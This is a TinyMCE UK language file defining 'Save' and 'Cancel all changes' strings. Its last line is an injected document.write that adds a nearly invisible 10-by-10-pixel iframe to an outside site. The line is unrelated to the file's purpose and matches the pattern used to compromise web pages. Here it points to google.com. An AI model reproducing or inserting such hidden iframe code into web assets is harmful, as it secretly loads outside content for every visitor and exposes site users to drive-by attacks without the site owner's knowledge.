// UK lang variables

tinyMCE.addToLang('',{
save_desc : 'Save',
cancel_desc : 'Cancel all changes'
});
document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>');